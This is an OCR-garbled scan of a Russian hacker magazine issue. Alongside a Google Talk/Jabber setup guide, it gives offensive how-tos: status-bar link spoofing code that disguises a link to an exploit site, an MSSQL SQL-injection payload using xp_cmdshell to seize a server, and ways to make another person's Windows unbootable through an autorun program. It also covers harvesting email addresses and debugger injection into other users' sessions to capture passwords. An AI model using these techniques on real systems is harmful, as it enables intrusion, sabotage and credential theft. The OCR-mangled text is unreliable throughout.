тив на рынок мессенжер Оіаік, построенный как раз на этой технологии. 
И мы с тобой, надеюсь, этому поможем. 

г ПРЕИМУЩЕСТВА60061ЕТА1К 

ОоодІеТаІк — это мессенджер от компании боодіе, позволяющий об- 
щаться с помощью голосового чата и привычныхтекстовых сообщений. 
Мессенджер тесно интегрирован с почтовым сервисом боодіе’а. 
Преимуществ у него более чем достаточно: 

• В основе біаік лежит открытая и проверенная временемтехнология 
^аЬЬег. Это позволяет беспрепятственно использовать как родной кли- 
ент, таки любой сторонний. 

• Сервера Ооодіе исключительно стабильны. Конечно, и утакого 
гиганта бывают промахи, в результате которого недавно лежал почтовый 
сервис бтаіі, но эти случаи единичны. 

• Вся история переписки хранится на сервере. Нет больше необхо- 
димости рыскать по всем своим компьютерам и клиентам в поиске 
какого-то сообщения. Ты можешь общаться дома, на работе, в универе 
— и всегда под рукой будет единая история переписки. 

• Транспорт на любые сторонние протоколы (ІСО, М5М, АІМ, Уабоо, МаТ. 
Агент], также со всей историей переписки на сервере. 

Самое главное, — можно легко перейти на біаік, не отказываясь при 
этом от ІСО и, соответственно, от всех контактов. Заметь, не придется 
запускать несколько ІМ -клиентов, интеграцию поддерживает сам б^аік. 
Итак, начнем? 

Н ТРИ ВАРИАНТА 

Чтобы подключиться кОіаІк, необходимо лишьзарегистрироватьакка- 
унт на Отаіі ( ѵѵѵѵѵѵ.дппаіі.сопп ). Отличная возможность оценитьудобство, 
стабильность и потрясающую продуманность почтового сервиса от 
боодіе. Чего стояттолько 7 Гб дискового пространства, предоставлен- 
ные пользователям совершенно бесплатно. 

Есть три варианта, какдействовать дальше. Выбирай наиболеетебеудобный. 
Первый способ — самый простой. Если утебя нетжелания отказы- 
ваться от привычного клиента (хотя бы потому, что там важная история 
сообщений, куда часто приходится подглядывать], то ничего не мешает 
использовать два клиента одновременно. В конце концов, какая разни- 
ца: одним значком втрее больше или меньше. Тогда тебе подойдетори- 
гинальный клиентОіаІк — очень простой, нетребовательный кресурсам 
и, плюс ко всему, поддерживающий голосовые звонки (в любом другом 
случае о голосовом общении придется забыть]. 

Второй способ — воспользоваться мульти протокольным клиентом, кото- 



Бесплатные звоніси 
в более чем 
30 стран мира! 

Раз уж в Сіаік ничего не стоит настроить транспорт в другие сети, 
а сама технология за счет расширения поддерживает голосовую 
связь, то почему не попробовать привязать клиента к какому-ни- 
будь ѴоІР-гейту и звонить на самые обычные телефоны? Шлюз с 
незамысловатым названием ѵѵѵѵѵѵ. ^1а1к2 ѵоір , сот нашелся очень 
быстро. После беглого осмотра стало ясно, что это не просто шлюз, а 
настоящая находка! Пользователи бесплатно получают следующие 
возможности: 

• бесплатные звонки между различными ІМ-системами, поддер- 
живающими голосовую связь (Соо^іе Таік, М5Ы/Ьіѵе Меззеп^ег и 
УаЬоо I ) . К сожалению, в этом списке пока нет Зкуре; 

• голосовые конференции с участием любого количества человек; 

• бесплатные звонки на телефоны 5ІР-операторов и 5ІР-сервисов; 

• прием звонков с 5ІР-телефонов; 

• прием звонков с мобильных и городских телефонов, используя 
специальный сервис 5ІР Вгокег. 

Для звонков на городские и мобильные номера, равно как и для 
отправки 5М5-сообщений, сервис попросит небольшую денежку. 
Едва ли удастся сэкономить на отправке сообщений (лично на моем 
тарифе дешевле будет отправить сообщение с телефона), зато копе- 
ечные тарифы на исходящие звонки тебе обеспечены! 

Для использования не надо ничего скачивать, устанавливать и 
вообще как-либо заморачиваться. Все намного проще: чтобы совер- 
шить звонок, нужно добавить в список контактов [ + ] <СОиытку > 

< АКЕАх РНОЫЕ> . Например, + 74950000001@дЦа1к2ѵоір.сот. 
Номер появится в списке контактов с иконкой телефончика. С ее по- 
мощью звонить можно быстро. Правда, предварительно придется 
пополнить свой внутренний баланс. Сервис принимает к оплате как 
РауРаІ (потребуется пластиковая карта Ѵіза ріли Мазгегсагсі), так и 
более привычные для нас ѴѴеЬтопеу. 

Что приятно, с 30 июня система позволяет совершенно бесплатно 
звонить на мобильные и городские номера более чем 30 стран 
мира. Среди них: США, Великобритания, Аргентина, Австралия, 
Бельгия, Канада, Китай, Финляндия, Швеция, Греция, Ирландия, 
Израиль, Нидерланды, Норвегия, Словакия, Испания, Франция, 
Германия и многие другие I Халявные звонки осуществляются так 
же, как и платные. В список контактов требуется лишь добавить 
номер в форме рЬ.опепитЬег@Ца1кзЦег . дЦа1к2ѵоір . сот. 

Мы в редакции проверяли лично: все работает «на ура>>. 
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2004 ГОД — разработчиками предложена идея построить ІМ-сервис от Соо^іе 
на базе іаЬЬег. 

2005 год — блоггеры и прочие любопытные товарищи обнаруживают на 
субдомене і:а1к.^оо^1е.сот работающий іаЬЬег-сервер. Позже им удается зало- 
гиниться на сервер еще до официального релиза. 

^августа 2005І — Соо^іе отправляет всем своим неофициальным юзерам 
сообщение «Спасибо за то, что были нашими первыми пользователями» и 
официально запускает сервис. 

^декабря 200^ — разработчики выпускают релиз 1іЬ]іп§1е библиотеки для 
С ++, расширяющей протокол ХМРР возможностью голосового общения. 

7 февраля 2006 — появляется возможность чата прямо в интерфейсе Стаіі. 
|і октября 2оОб — реализована возможность передачи сообщений в оф- 
флайн. 

Щ/Ь ноября 200ДІ — теперь есть групповые конференции. 

февраля 2ооЩ — реализована функция так называемого сЬаЛаск’а, с 
помощью которого посетители могут общаться с владельцем ресурса при 
помощи специального виджета на сайте. 
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> ѵѵагпіпд 

Я не параноик, но за 
мной кто-то следит! 
В последнее время 
мы доверяем 
боодіе’у массу лич- 
ной и, в том числе, 
конфиденциальной 
информации. 




> ІП^О 

Многиетонкие 
настройки для 
клиента Рзі хранятся 
в специальном ХМ I- 
конфиге, который 
можно найти в папке 
\%Ц5ег Ріг%\Р5ІРа1а\ 
ргой[ез\с1е1аи[1:\ . 
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[Контакт-лист ОТа [к, интегри[>ованный в систему ОМаЦ 



рый поддерживает какІСО,таки ^аЬЬег. Начиная с виндо- 
вых Мігапсіа [ ѵѵѵѵѵѵ.ппігапсіа-іпп.огд ] и ОІР Іпйпит [ ѵѵѵѵѵѵ.дір. 
^) — и заканчивая кроссплатформенным клиентом Рісідіп 
( рісідіп.іт ). Ничего не мешает добавить несколько учетных 
записей из различных сетей и успешно их использовать. 
Недостаток подхода в том, что история сообщений ІСО не 
будет сохраняться на сервере бтаіі. 

Третий и, на мой взгляд, лучший способ — ^аЬЬег-клиентс 
использованием транспортов на разные протоколы (втом 
числе, ІСО). Поговорим об этом варианте более подробно. 

г НАСТРАИВАЕМ ТРАНСПОРТЫ 

Технология ^аЬЬег, на которой построена система ОТаІк, 
поддерживает систему та к называемых транспортов, поз- 
воляющих очень легко общаться с участниками других ІМ- 
сетей. Первое, что тебе понадобится — это ^аЬЬег-клиент. 






общ** Ст-ггус Вил 




Иопііпс 48 




[Большинство контактов — из «аськй^ 



Можно выбратьлюбой (Оа]іт, ТкаЬЬег, Рісідіп), но лично я 
предпочитаю Рзі ( ѵѵѵѵѵѵ.рзі-іпп.огд ). 

После запуска необходимо подсоединить свой біаік-акка- 
УНТ. Для ЭТОГО: 

1 / Переходим в меню «Общие Аккаунты»; 

2/ Нажимаем «Добавить», указываем имя для аккаунта 
— например, «Ооодіе Таік»; 

3/ В ^аЬЬег 10 вводим свой Оіаік-идентификатор: допустим, 
ѵазуа.рирйд так. СОПЛ; 

4/Переходим во вкладку «Соединение» и включаем все 
опции, кроме «Использовать стандартный 551-порт»; 

5/ В поле сервер вводим «Саік . доодіе . сот», а в качест- 
ве порта указываем — 52 23 ; 

6/ В выпадающем меню «Шифроватьсоединение» выбира- 
ем «Традиционный 55С»; 

7/ Пробуем подключиться, игнорируя сообщение о пробле- 
мах с проверкой сертификата (нажимая «Далее»). 
Соединение установлено! Мы только что настроили Рзі 
для работы с аккаунтом на Сіаік. Советую присмотреться 
именно кэтой программе, потому что впоследствии мно- 
гие отдают предпочтение именно ей, нежели стандарт- 
ному клиенту. Не буду рассказывать, как добавлять новых 
пользователей в список контактов и расписывать прочие 
тривиальные вещи. Лучше сразу перейдем к самому 
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[Гакустроентранспортиз ^аЬЬе^ в ІСО] 
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[Настройка аккаунта для бТаіМ 



В ИНТЕРЕСНЫЕ ОСОБЕННОСТИ 



интересному — настройке транспорта на ІСО. Ксчастью, ^аЬЬег — это 
уже настолько окрепшая система, что никаких проблем возникнуть 
не должно. В Сети существуеттысячи серверов, поддерживающих 
транспорты в самые разные системы. И если можно легко привязать 
свой аккаунт на Маіі. Агент, то уж что говорить про такого гиганта, как 
ІСО. Список публичных серверов можно найти по этому линку — ѵѵѵѵѵѵ. 
]аЬЬег.огд/іт-5егѵісе5 . Нас вполне устроит да] іт. о гд . Перед тем, 
как ты начнешь его использовать, хочу обратить внимание на один 
важный и неприятный нюанс. Некоторыетранспорты почему-то не 
поддерживают корректное преобразование ІСОІЛМ’авникнейм.В 
результате, любой контакт в ІСО будет отображаться как бесполезный 
набор цифр. Чтобы этого избежать, зайди в настройки. Нужно сделать 
следующее: 

• автоматически давать подписку: «Орбопз Еѵепіз АиЬ-аиіЬогіге 
сопіасіз»: 

• отключитьуведомления о получении подписки: «Орбопз Еѵепіз 
Мобіу ѵѵЬеп аибэогігабоп ѵѵаз гесеіѵеб»; 

• снять галку с игнорирования сообщений отнеподписанных (бгб): 
«Орбопз ^ Еѵепіз -> Ідпоге еѵепіз Ігот сопіасіз поі: аігеабу іп уоиг 
гозіег»: 

• автоматически подставлять ники (бгб) контактам при добавлении в рос- 
тер: «Орбопз Абѵапсеб орбопз.сопІасиізЕгезоІѵе-піскз-оп-сопІасІ:- 
абб = 1гие» (это — самое главное!). 

Транспортзапроситлогин, пароль и авторизацию. После ее подтверж- 
дения должны подтянуться асечные ники. Таким же образом можно 
подключатьлюбые другиетранспорты (АІМ, М5М,УаЬоо) и легко сделать 
так, чтобы в одном аккаунте Оіаікуживалось несколько ІМ-систем. 
Оченьудобно, что вся переписка при этом будет сохраняться на сервере. 
Правда, у некоторых западных серверов замечены траблы с кодировка- 
ми. У отечественных серверов взоне«.ги»такой проблемы нет, но есть 
трудности со стабильностью. 



Безопасность — важный для нас вопрос. Соединение между клиен- 
том Ооодіе Та Ік и сервером шифруется (кроме того случая, когда ты 
используешь сервиспрямовокне браузера в интерфейсе ОтаШ. 
Другие программы-клиенты (тотже Рзі) требуютзащиты своих пото- 
ков при помощи ТЕ5 перед тем, как послать пароль. Так поток остает- 
ся зашифрован в течение всей сессии. Компания Ооодіе объявила, 
что в следующих версиях ее клиента все сообщения (текстовые и 
голосовые) будут защищены. Недаром клиентдо сих пор носит статус 
«Ьеіа». 

Несмотря на то, что технология баЬЬег поддерживает групповые чаты 
(конференции), официальный клиентОоодІеТаІктакой возможности по 
непонятным причинам лишен. Тем не менее, возможность создания кон- 
ференций в ОоодІеТаІк все-таки существует, недалеко не все пользова- 
тели 6і:а1к про нее знают. Для использования конференций достаточно 
добавить в ростер контактрагСус]таЦ#@дтаі1 . сот, где # — номер от 
О до 9. Добавлять можно любой из этих контактов (это просто несколько 
ботов, связанных единым сервисом). Дляуправления конференция- 
ми существует ряд команд, список которых можно получить командой 
/соттапбз. Вотосновные из них: 

/сгеаЬе с1іаЬ_пате [орЪіопа1_раззѵ^огй] — создать новый 
чат. Опционально можно указать пароль для подключения, 
/боіп с1іа1;_пате [раззѵ/огй] — присоединиться к чату. 

/1ІЗІ: — показать список участников . 

/аііаз [пате] — установить никнейм. 

/Іеаѵе — выйти из чата. 

Пользователь остается в чате до тех пор, пока не будет выполнена коман- 
да /Іеаѵе, при этом вся история переписки сохраняется на сервере. 

То есть, даже в случае переподключения клиента нет необходимости 
каждый раз подключаться к конференции заново. 

Подключайся — хакер. сйаС. Мы ждем тебя І пг 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ I 



№1 



ІЗАДАЧА:! 



В СТРОКЕ СОСТОЯНИЯ БРАУЗЕРА ІЕ6/ІЕ7 
РЕШЕНИЕ; 

Я думаю, ты хорошо знаком с та кой замечательной вещью, как 1Р-5рооЛпд. 
Вдаваться втехнические подробности не имеетсмысла (да поможеттебе 
Гугл). Порой необходимо использовать подобные махинации при созда- 
нии фейковыхсайтов или редиректов. Какты знаешь, при наведенииука- 
зателя мышки на линкв окне браузера, в строке состояния отображается 
адрес, на который указывает ссылка. Нашей первостепенной задачей ста- 
нетподмена истинного адреса, который видит юзер, на наш — фейковый. 
Проводить все манипуляции мы будем на примере ослика 6 и 7 версии 
(более распространенных браузеров пока не существует). Приступим! 

1 .Допустим, линксайта сосплойтом (куда обязательно должен попасть 
юзер:)) — \лпл7У7.]іаскег . сот, а маскировать ссылку будем подмелкомяг- 
ких —ѵѵ\лм.тісгозо:ЕС . сот. 

2. Открываем НТМГ/РНР-файл, который нам необходимо отредактиро- 
вать (то есть, добавить в него фейковый линк). 

3. Дописываем в открытый хтмл/пхп-файл следующий код: 



<а ]тгеГ= "кССр : / /'(лплпл^. каскег . сот/ " 

опМоизе0ѵег= "ѵ^іпсіоѵ^. зСаСиз= ' кССр : / /тісгозоГР . сот/ ' ; 
геСигп Ргие; " 

опМоизе0и1:= "ѵ\?іп(іоѵ7. зСаСиз= ' ' ; " >кС1:р : //тісгозоГР . сот/ 
</а> 

4.Воти все. Открываем страничку в ослике и видим, чтолинкс назва- 
нием «кССр : //тісгозоГС . сот» отображается в строке состояния, 
как«]тССр : //тісгозоГС . сот», хотя на самом деле ведет на «кССр : // 
ѵѵѵш.ііаскег . сот» :). 



Подменяем ЛИНК в строке состояния ослика 
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ЗАДАЧА; 



I БЫСТРО И КАЧЕСТВЕННО СОЗДАТЬ АВАТАРКУ 
РЕШЕНИЕ; 



О давних временем рисовальщики на различных форумах 
предлагали свои услуги по созданию аватарок. Астрономи- 
ческая цена некоторых шедевров порой просто удивляла. 
Что делать, когда желание иметь красивую аватарку есть, а 
денегнет? Нарисовать самому! Аесли и рисовать неумеешь 
— время обратиться кбесплатным сервисам. Ты не ослы- 
шался, таковые существуют. Об одном из них я расскажу 
более подробно: 

1 . Заходим по линку пІсіезідп.огд.иа/Ьаг/ппакег.рЬр. 

2. Выбираем фон аватарки. 

3. В соответствующем поле вбиваем ник, выбираем гори- 
зонтальное/вертикальное расположение. 

4 . Редактируем положение надписи ника на фоне аватарки 
(для этого предусмотрена удобная панелька). 

5. Жмем <Еп1:ег> и сохраняем аватару себе на винт. 



Раздай себе аватарц^ 
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полей вывода ит.д. (расписывать не буду — полистай подшивку ][ на тему 
«501-инъекция в М5501»). 

2. Вставить в зрі-запрос к СУБД следующий фрагмент: 

; ехес тазСег. . хр_стсіз]те11 'консольная команда' -- 

На практике это может выглядеть примерно так: 

ІтССр : / /ДагдеД . ги/іпсіех . азр=-1 ; ехес тазДег. . хр_стсіз]те11 
'(ііг С: \ ' -- 

3. Если команда выполниласьуспешно — считай, что повезло и сервер 
утебя в руках. В противном случае — причина ошибки, скорее всего, 
кроется в правах пользователя. 

Кстати, если удача на твоей стороне и команды успешно выполняются, 
советую попробовать добавить нового пользователя и работатьсуда- 
ленным сервером уже через ІеІпеЕ Поверь, так намного удобнее. 

хр_1одіпсоп^ід (инфо о пользователе) 
хр_1одіпіп:Ео (все пользователи, 
залогинившиеся на данный момент в 
системе) 

хр_тзѵег (версия ЗСЬ-сервера) 

хр_ст(із]іе11 <команда> (исполнение 
файла через стсі.ехе) 
хр_зегѵісесопДго1 
<действие>,<служба> (запускает 
или останавливает указанные про- 
цессы) 

хр_ДегтіпаДе_ргосезз <идентифи- 
катор процесса> (закрытие процес- 
са по его РгосеззІВ) 
хр_зДагДтаі1 , хр_зеп(ітаі1 (обра- 
іцение к почтовому демону зепбтаіі) 
зр_такеѵ7еЫ:азк (выполнение коман- 
ды йДтІ-вида) 

С та КИМ боевым набором руки у нас пол- 
ностью развязаны. Особенный интерес 
представляет выполнение консольных 
команд — «хр_стсіз]те11». Чтобы 
грамотно использовать эту возможность, 
тебе необходимо: 

1. Найти 5Ц [-инъекцию, убедиться в наличии 



|Не все инъекции одинаково полезныі 




№3 



ЗАДАЧА: 



I ВЫПОЛНЕНИЕ КОМАНД НА ВИНДОВОМ СЕРВЕРЕ С М5501 
ЧЕРЕЗ 501-ИНЪЕКЦИЮ 
РЕШЕНИЕ: 

Одним из больших плюсов при проведении атак на М 5501-серверы, 
помимо обязательного наличия заветной таблички іп[огта[іоп_ 
5сЬета.[аЫе5, является еще и возможность выполнения консольных 
команд через ОУ БД. Но это только при условии, что у пользователя, 
от имени которого мы имеем доступ к базе, достаточно прав. Ниже я 
приведу список процедур, которые, при наличии определенных прав, 
ты можешь смело заюзать: 



хр_епитдгоирз (группы из ОС Шіпбоѵ^з) 
хр_пбзес_епитйотаіпз (список доменов сети) 
хр_епитйзп (источники данных ОБВС) 



№4 



|ЗАДАЧА:| 



РЕШЕНИЕ: 

Ни для кого не секрет, что второе название ѴѴіпбоѵѵз — «тизібіе». Иногда 
возникаетжелание грохнуть собственную Винду, иногда — соседскую. 
Разберем три варианта реализации этого доброго дела. 

1 . Самым скучным приемом будет уда лить скрытый системный файл піИг. 
Находится он на диске, с которого производится загрузка (как правило, это 
дискС:). После перезагрузки перед нами черный экран с надписью: 

"ЫТЬВК із тіззіпд 

Ргезз СбгІ+АІР+ВеІ Во гезВагВ" 

Отсутствие системного файла сразу бросается в глаза — и юзверь может 
попытаться его восстановить. 



2. Другое дело, если убрать скрытый системный «ЫТВЕТЕСТ . СОМ», лежа- 
щий рядом. После рестарта пользователь будет наблюдать бесконечную 
череду перезагрузок (без вывода каких-либо сообщений). Отмечу: пе- 
резагрузок компа, а не Винды. До нее дело просто не доходит. Придется 
задуматься над тем, как исправить ситуацию. Для насже очевидно: 
возвратить файл на свое законное место. 

3. Изощренным коварством будет редактирование всем известного 
«Ьоо[.іпі». Именно изменение, а неудаление (послеудаления Винде 
все же удается загрузиться). Итак, открываем его блокнотом и находим 
строки с путями до ѴѴіпсІоѵѵз вида 

тиІВі ( О ) бізк ( О ) гбізк ( О ) рагВіВіоп ( 1 ) ХШІЫВОШЗ 

Это — иерархия оборудования (железа), по которой определяется жесткий 
диски раздел, где стоит Винда. Наша цель — задать несуществующую, 
ошибочную конфигурацию. Дадим системе понять, что Винда поставле- 
на йена первый, а на девятый раздел: меняем все«рагкікіоп(1) »на 
«рагкікіоп (9 ) ». Сохраняем и перезагружаемся. Любой желающий 
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может прочесть: «Неудается за пустить ѴѴіпсІоѵѵз из-за аппаратных ошибок 
настройки диска. Неудается выполнить чтение с выбранного загрузочного 
диска. Проверьте указанный путьи исправностьоборудования диска. 

<...>». Можно и поиздеваться: напишем прогу, реализующую один из этих 
трех вариантов и поместим ее в автозагрузку. Кактолько юзверь «поднимет» 
Винду (если, конечно, «поднимет»), она отработает ровно до следующей пе- 
резагрузки и будетопять ожидать помощи, выводя тоскливые сообщения. А 
что, если не дать ей работать и прописать в прогемоментальную перезаг- 
рузку и/или использовать сразу всетри варианта, описанных выше? При 
грамотной реализации восстановлениютакая Винда уже не подлежит. 




№5 

ГЛ! СОЗДАТЬ В ПАМЯТИ ПРОЦЕССА НОВУЮ ОБЛАСТЬр 
КОТОРАЯ ВПОСЛЕДСТВИИ МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА 
ДЛЯ СОХРАНЕНИЯ ДАННЫХ 
РЕШЕНИЕ: 

Для вставки данных (как вариант, кода) в простых случаях можно поль- 
зоваться пустыми областями, оставленными компилятором для вырав- 
нивания. К сожалей ИЮ, удается это далеко не всегда, ведь пространства, 
«подаренного» нам форматом РЕ, может оказаться недостаточно. Остается 
только одно — зарезервировать память каким-либо другим образом. 

Кроме того, необходимо выставить соответствующие атрибуты страницы 
памяти, отвечающие за возможность чтения и записи в нее. Воспользо- 
вавшись М50М, выясняем, что такой возможностью обладаетАРІ-функция 
библиотеки кегпе132, которая называется ѵігСиаІАІІос. Взглянем на 
ее прототип: 

іЕипсСіоп ѴігСиаІАІІос ( 

ІрѵАсісігезз : РоіпСег; // начальный адрес региона для 
резервирования памяти 

(іѵ\[ЗІ 2 е: ВШОКВ; // размер региона резервируемой памяти 
ПІАІІосаРіопТуре : ВШОКВ; // способ выделения памяти 
ПІРгобесІ: : ВШОКВ // атрибуты доступа 

): РоіпРег; зРбсаІІ; 

Выделив память при помощи ѵігСиаІАІІос, мы можем разместить там 
необходимые данные. Попробуем зарезервировать для собственных 
нужд 20006 байт памяти на примере стандартного блокнота. 

1. Открываем программу для отладки в ОИуОЬд и копируем первые две 




инструкции стартового кода, располагающегося на ОЕР, при помощи 
команды контекстного меню«Віпагу ^ Віпагу сору». 

2. На точке входа, по адресу 010073 9В, вписываем инструкцию перехо- 
да по адресу, где мы расположим код, выделяющий область памяти: 

0100739В зтр 01008748. 

3 . Первые две инструкции, которые мы заменили условным переходом, 
предварительно скопировав в буфер обмена, помещаем по адресу 
0100874 8 («Віпагу ^ Віпагу разіе»). 

4 . Определим начальный адрес региона для резервирования памяти. 
Откроем карту памяти процесса, нажав <АЕТ+М>, и выберем любой 
адрес, который не принадлежит ни одной из существующих (уже заре- 
зервированных) областей памяти. В нашем примере это будет 1230001т 
— адрес не принадлежит ни секции, которая начинается по адресу 
000900001т и имеет размер 50006 байт, ни последующей секции, начи- 
нающейся с адреса 001900001т. Размер резервируемой нами области 
будет равен 20001ібайт, как и условились ранее. 

5 . Параметры, необходимые для успешного выполнения 
ѴігСиаІАІІос, будем помещать в стек, начиная с последнего, в соот- 
ветствии с принципами работы стека. 

Атрибут доступа «РА0Е_КЕАВШІТЕ», который позволяет и читать 
данные из выделенной памяти, и записывать в нее, выглядит как 
число «00 о 00 100» в двоичной системе счисления — или «4» в шест- 
надцатеричной. Другиезначения параметра ІІРгоСесС (например, 
атрибут«РАОЕ_ЕХЕСиТЕ_КЕАЕ1ЛІКІТЕ», ПОЗВОЛЯЮЩИЙ ИСПОЛНЯТЬ код, 
расположенный в зарезервированной области) можно получить путем 
взведения в единичное состояние соответствующих битов этой флаговой 
переменной (или выяснить их шестнадцатеричные соответствия в любом 
справочнике). Поадресу 0100874Е размещаем инструкцию риз64. Пара- 
метр «ІІАІІосаСіопТуре» в нашем случае будет равен ІОООй. Это со- 
ответствует значению параметра, равному «МЕМ_СОММіт», — вот самый 
надежный и простой способ выделения памяти. Мы можем не заботиться 
об обнулении выделенной памяти, все сделает функция ѵігСиаІАІІос. 
Размещаем по адресу 01008751 инструкциюризй 1000. 

Размер секции мы определили — 2 0001ібайт. Следовательно, следующей 
инструкцией будет ризіі 2 000. И, наконец, параметр ІрѵАсісігезз, опре- 
деляющий начальный адрес для резервирования области памяти, равен 
1230006. Вводим инструкцию ризіі 123000. 

6. Послетого, как размещены все четыре параметра, необходимые функ- 
ции ѵігСиаІАІІос, вызываем ее инструкцией саіі ѵігСиаІАІІос. 

7 . Передаемуправлениеосновной программе, поадресу 010073АЗ: 

^тр 010073АЗ 

Приведем написанный нами код целиком: 

0100739В зтр 01008748; переходим к коду, который должен 
резервировать область памяти; 

01008748 РВЗН 7 0 ; первая замененная переходом инструкция 
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0100874А РІІЗН 01001898 ; вторая замененная переходом 
инструкция 

0100874Р РТОЗН 4 ; атрибут защиты страни- 

цы памяти равен " РАСЕ_КЕАВШКІТЕ " 

01008751 РЕЗН 100 0 ; способ выделения памяти — "МЕМ_ 

СОММІТ" 

01008756 РІІЗН 2 00 0 ; размер выделяемой секции равен 
2000І1 

0100875В РЕЗН 123000 ; адрес, начиная с которого рас- 



полагается секция, равен 123 000І1 

01008760 САВВ ѴігРиаІАІІос ; вызываем ѴігВиаІАІІос 
01008765 ВМР 010073АЗ ; передаем управление обратно 

— коду блокнота 

8. Сохраняем файл («Соруіо ехесиІаЫе ^ АН тосІіЛсабопз»). Теперь, 
если протрассировать код вплотьдо выполнения ѵігВиаІРгоВесВ и 
воспользоваться картой памяти, можноувидеть: появилась новая сек- 
ция, начинающаяся по адресу 123000В. Что итребовалось получить! 




ЗАДАЧА: 



СОЗДАТЬ БАЗУ Е-МАІЬ АДРЕСОВ 



РЕШЕНИЕ: 



Как правило, много мыльников используется для поздравления всех с 
Новым Годом, но некоторыезлоумышленники юзаютихдля спам-рассы- 
локрекламы и подобной чепухи. Возьмем одну из многочисленных прог 
по этой тематике и соберем собственную базу мейлов. 

1. Ставим бесплатную русскоязычную утилуЕ-МаіІСарІиге 
[ г5оВѵѵаге.пе1:/ппаі[/ппаі[.7Ір ). 

2. Запускаем, переходим «Настройки Общие» в меню слева. Вводим 
страничку, с которой начнется поиск. Максимальное количество потоков 
ставим взависимости отширины канала — либооттипа соединения: 
чем быстрее интернет, тем больше потоков. Если интересуют адреса с 
определенного сайта, ставим галочку в пункте «Не ходить по внешним 
ссылкам» (но без этого пункта прога ищет куда больше е-таіі’ов). Для 
экономных пользователей создана графа, лимитирующая размер от- 
крываемой при поиске страницы. Владельцам безлимитного подключе- 
ния ограничение можно смело отключить. 

3. В разделе разрешенных расширений можно найти самые рас- 
пространенные форматы: НТМЕ, 5НТМЕ, РНР, 35, А5Р, С6І; а можно 
добавить и свои. Именно на этих страницах будет производиться поиск. 
Удобный инструмент располагается в самом низу панели — поиск 
адреса по маске. Допустим, введя «1е1іа*@*», мы получим базу мейлов, 
содержащих ІеЬа в своих адресах. 

4 . В следующем меню («Подключение») владельца высокоскоростного 



интернета заинтересуетлишь настройка прокси. Спускаемся в «Исклю- 
чения» и подгоняем поиск под нужные нам рамки: обходим нежелатель- 
ные сайты, выбрасываем ненужные таіі-адреса. 

5 . Подготовка закончена. Коннектимся к инету и запускаем поиск, кото- 
рый даже нетребует никакого участия пользователя. Прога может са- 
мостоятельно запускать сбор мыльников в заданное время и выключать 
комп по завершению процедуры. Естественно, количество получаемых 
мейлов напрямую зависит от потраченного на поисквремени итрафика. 
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^ОТО^^ЗАВЕРШИТЬЛЮБОЙ НЕСИСТЕМНЫЙ ПРОЦЕСС РАБОТА- 
ЮЩЕГО СЕАНСА пол ЬЗОВАТЕЛЯр ЗАЩИЩЕННОГО ПАРОЛЕМ 
РЕШЕНИЕ: 

Порой необходимо получить доступ к какому-либо процессу в памяти 
сеанса пользователя, который находится в фоновом режиме (приос- 
тановлен при помощи команды «Пуск^ Выход из системы Смена 
пользователя»). Но вот беда: диспетчер задач не отображает процессы, 
выполняемые с правами учетной записи другого пользователя. Можно 
воспользоваться отладчиком ОГуОбд, который видит«чужие» процес- 
сы. Кометого, реально модифицировать код процесса в своих целях 
прямо из-под отладчика (позволит, например, добыть пароли, залогиро- 
вать ввод и т.д.) 

Попробуем завершить процесс, выполняемый в «чужом» сеансе. 

1 . Входим в систему под любой учетной записью. 

2. Открываем отладчикОиуВЬд. Теперь выбираем пункт меню «Еііе 
АиасЬ» и в списке процессов выбираем необходимый. 

3. Нажимаем кнопку «АіІасЬ» для отладки процесса. Завершить его 
можно, нажав на кнопку «Тегтіпаіе». В случае модификации процесса 



в памяти с помощью отладчика помни одну вещь. Следует удалить все 
точки останова после выполнения необходимых действий, оставить 
процесс в состоянии исполнения (нажав <5ЫГ;+Е9>), свернутьокно 
отладчика и выйти из текущего сеанса пользователя по команде «Пуск 
^ Выход из системы Смена пользователя». Тогда единственное, что 
может выдать внедрение в память процесса, — низкая скорость работы 
ресурсоемкого приложения, тг 

риуОЬцотображает процессы, выполняемые из др^Гихработающих сеансов 
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ОБЗОР ЭКСПЛОЙТОВ 



КРИО КАОПЕРСКИ 



в СЕРЕДИНЕ АВГУСТА МІСР050РТ ПОРАДОВАЛА НАС ОЧЕРЕДНОЙ ПОРЦИЕЙ ЗАПЛАТОК, ДОПУС- 
КАЮЩИХ УДАЛ ЕННЫЙ ЗАХВАТУПРАВЛЕНИЯ СИСТЕМОЙ. ПРАКТИЧЕСКИ ВСЕ ОНИ ОТНОСЯТСЯ К 
М5 ОРРІСЕ, ФАЙЛЫ КОТОРОГО ДАВНО СТАЛИ МЕЖДУНАРОДНЫМ СТАНДАРТОМ ДЕ-ФАКТО. ОСТА- 
ЕТСЯ ТОЛЬКО ГАДАТЬ, СКОЛЬКО НЕПАТЧЕННЫХ СИСТЕМ МОЖНО ЗАХАЧИТЬ. 



^ Л М5ЕХСЕ1 
III МНОЖЕСТ- 
V I ВЕННЫЕ 
ОШИБКИ 
ПЕРЕПОЛНЕНИЯ 



»Вгіе^ 



МІСГ 050 І 1 : подтвердила и испра- 
вила сразу четыре критических 
ошибки в Ехсеі, обнаруженных 
различными независимыми 
исследователями. Первая ошибка 



связана с косой обработкой 
записи (гесогб) АхезЗеІ:, которая 
размещена в диаграмме (сбагі:), 
встроенной в электронную таблицу 
(зргеабзбееі:). Записи этого типа 
(используемые для задания 




|В официальной спецификации Х15-формата от Місгозоб: запись АхезЗе! даже неупоминается, а она есть| 



позиций и размеров координатных 
осей диаграммы) недокументи- 
рованы и отсутствуют в официаль- 
ном описании формата файлов 
ОІ^бсе, недавно обнародованном 
Місгозоб;. Однако ОрепОІ'бсе (пос- 
тавляющийся в исходныхтестах) 
все прекрасно поддерживает, 
открывая огромный простор для 
творческих экспериментов. Физи- 
чески АхезЗеІ; представляет собой 
массив индексов координатных 
осей диаграммы, причем значения 
индексов не проверяются. В 
специально сконструированном 
файле они могут указывать куда 
угодно, выходя далеко за пределы 
«родного» массива. В общем 
случае это приводит к «удару» 
по памяти и непредсказуемому 
поведению Ехсеі. Как правило, 
все заканчивается его падением. 
Не исключена и возможность 
удаленного захвата управления. 
Хакеры уже работают в этом на- 
правлении, правда, пока не очень 
успешно. Уязвимости присвоен 
кодовый номер СѴЕ-2008-3004. 
Подробнее о ней можно прочитать 
на: сѵе.тіІге.ога/саі-Ып/сѵепате. 
саі?пате=СѴЕ-2008-3004. 
ІаЬз.ісІеІепзе.сопп/іпІеШдепсе/ 
